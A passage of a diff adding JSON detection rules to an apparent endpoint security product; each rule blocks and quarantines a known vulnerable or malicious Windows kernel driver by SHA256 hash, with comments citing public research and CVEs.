+ "references": [],
+ "type": "hash",
+ "value": "25b6f65c07b83293958c6f1e36d053b1d39c5dde864fde5cfc1834ecca591139",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c7f53393-3aff-5801-9092-1271c2a54d08",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.820124Z",
+ "creation_date": "2026-03-23T11:45:30.820126Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.820131Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "14a0a9fe317192b54fda1516f46af78e6aabac0cf050bf18ec1e5ddaefd8e051",
+ "comment": "Vulnerable Kernel Driver (aka nvoclock.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c8097ad6-8b0b-5aea-87fd-975054f83666",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.828112Z",
+ "creation_date": "2026-03-23T11:45:31.828115Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.828120Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "cd3b251ac86c22d91ab802841869285776c07e1d51c8b813e1538a3875396e12",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c80b8259-83ab-54da-ab5b-22a088c4ed4d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.969238Z",
+ "creation_date": "2026-03-23T11:45:29.969241Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.969246Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a5a50449e2cc4d0dbc80496f757935ae38bf8a1bebdd6555a3495d8c219df2ad",
+ "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c80e7c1a-7902-5fb3-a4b2-9afea19044f2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.823731Z",
+ "creation_date": "2026-03-23T11:45:31.823733Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.823739Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "303f52270ee7b8c4e3c2256e7d3710004f8dc6a753fa0ec9d7aadf863e91f171",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c816e426-59a8-5b52-a894-046f53b0e987",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.823626Z",
+ "creation_date": "2026-03-23T11:45:30.823628Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.823634Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a423b34233d44c6ca5f2e33aa47e645dc431c71a642e0b0b40f2f2f0d48e8198",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c81c2ce1-fabd-5d52-af0f-f4a23bdd58b2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.834668Z",
+ "creation_date": "2026-03-23T11:45:30.834672Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.834680Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "756388618fb0ac8c172bc08ab17bbfaece56a980f70ab4cd60a65ca1488b1799",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c824b544-8a10-52ad-b8fa-955ac0b3f9cf",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.818962Z",
+ "creation_date": "2026-03-23T11:45:31.818965Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.818974Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "bd9da6db9c9ab066e44cc1653ad2bf817492850afd95b838df7f19b92254a5a2",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c82be96f-332a-50e7-a1c2-0dbdbbd9d436",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.819602Z",
+ "creation_date": "2026-03-23T11:45:30.819604Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.819610Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b8321471be85dc8a67ac18a2460cab50e7c41cb47252f9a7278b1e69d6970f25",
+ "comment": "Vulnerable Kernel Driver (aka nvoclock.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c84d262a-aba9-517d-834b-e2c8cbcb40ad",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.160221Z",
+ "creation_date": "2026-03-23T11:45:31.160223Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.160228Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d8aec725fe23677aad785a819400da5c2bc8436804a965a256806ff6e37bb19d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c8521409-d970-5d97-90e8-eaf88d7fe442",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.827212Z",
+ "creation_date": "2026-03-23T11:45:31.827214Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.827223Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "26dde0eacfe6d99cd59ccb6e47597c9765489e30ecf9a27ea0be023fc31b019e",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c854a0fb-9a3d-5639-8af9-fd3856fd379d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.617024Z",
+ "creation_date": "2026-03-23T11:45:29.617026Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.617031Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5167b33a95b4db0a1244cb3b95d4024587d9a5a95222babb033210e6b111d2fb",
+ "comment": "American Megatrends vulnerable BIOS flash tool (aka UCOREW64.SYS and amifldrv64.sys) [https://www.loldrivers.io/drivers/a338a9fc-9fe3-400c-9fe4-69bb7892602d/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c858192d-5477-5358-8aff-c3bacbc6085a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.489230Z",
+ "creation_date": "2026-03-23T11:45:31.489232Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.489239Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7626cbd757986a641705d133823994b458a16d7e93901e3bef15b4ce6cb54be2",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c8632ad8-a407-5905-bafe-1f547c817fca",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.143615Z",
+ "creation_date": "2026-03-23T11:45:31.143617Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.143622Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e88d6d62ec6d4ee772fabb2d5bf4844cf55c6a1d87db692ad30a9660089d96d1",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c86c1719-503b-5865-bd8c-bc16a9fd2304",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.978066Z",
+ "creation_date": "2026-03-23T11:45:29.978068Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.978074Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c0d88db11d0f529754d290ed5f4c34b4dba8c4f2e5c4148866daabeab0d25f9c",
+ "comment": "Malicious Kernel Driver (aka ntbios_2.sys) [https://www.loldrivers.io/drivers/33a9c9ae-5ca3-442d-9f0f-2615637c1c57/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c87ce225-1ba6-53d5-b2f9-9cb59581830a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.609719Z",
+ "creation_date": "2026-03-23T11:45:29.609721Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.609726Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8e88cb80328c3dbaa2752591692e74a2fae7e146d7d8aabc9b9ac9a6fe561e6c",
+ "comment": "Novell vulnerable driver (aka nicm.sys, nscm.sys and ncpl.sys) [CVE-2013-3956] [https://www.loldrivers.io/drivers/f4126206-564f-49f5-a942-2138a3131e0e/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c898de3c-fba8-5115-9959-88940ccb0e1f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.497510Z",
+ "creation_date": "2026-03-23T11:45:31.497513Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.497519Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1c9932bb8d070f8ee18b54607ad25d347e9a5464bbf46f128be30e5126b5b8ed",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c8a60329-a39a-512b-b1b7-cb4b238fc7e9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.485417Z",
+ "creation_date": "2026-03-23T11:45:31.485421Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.485431Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "188ee7fda1d997b4390bfda1c2fc173d5eb6f1a47865a9e0ca62807a7405ebb2",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c8a6cde7-d099-5f90-9837-f5af874a1526",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.454565Z",
+ "creation_date": "2026-03-23T11:45:30.454568Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.454577Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "15d44fa77f8d922b5cf03425116c394eefc20ae9a082d3d7f10e68b832be36e7",
+ "comment": "Vulnerable Kernel Driver (aka kEvP64.sys) [https://www.loldrivers.io/drivers/fe2f68e1-e459-4802-9a9a-23bb3c2fd331/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c8a8c418-975f-5daf-9e55-320b76eb97ad",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.983981Z",
+ "creation_date": "2026-03-23T11:45:29.983983Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.983989Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e466e2bf4e190edd8717f6e8466b77a66b3304f5ae1458ca4400025a869fdfd1",
+ "comment": "Vulnerable Kernel Driver (aka LMIinfo.sys) [https://www.loldrivers.io/drivers/a02ee964-a21e-4b08-9c98-a730c90bfd53/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c8c0cbf0-2673-54b3-85a9-181c1d100d51",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.823500Z",
+ "creation_date": "2026-03-23T11:45:31.823503Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.823512Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6df12669f7e96e72ef5cbb3b8bd1dfc2d359a0023f3c9d216c5fbdb84a44c2ef",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c8ec34d0-4dc0-53f1-aa4c-9b9a93f89af8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.622579Z",
+ "creation_date": "2026-03-23T11:45:29.622581Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.622586Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8939116df1d6c8fd0ebd14b2d37b3dec38a8820aa666ecd487bc1bb794f2a587",
+ "comment": "PassMark vulnerable driver (aka DirectIo32.sys and DirectIo64.sys) [CVE-2020-15479] [https://github.com/eset/vulnerability-disclosures/blob/master/CVE-2020-15479/CVE-2020-15479.md] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c8f1ec12-08ea-577f-820f-ec3ecde62bc2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.153424Z",
+ "creation_date": "2026-03-23T11:45:31.153427Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.153436Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8908a5eea68b2671143bd4f5e87d941fbf037693b7bdf20a3fa10783d0061e5e",
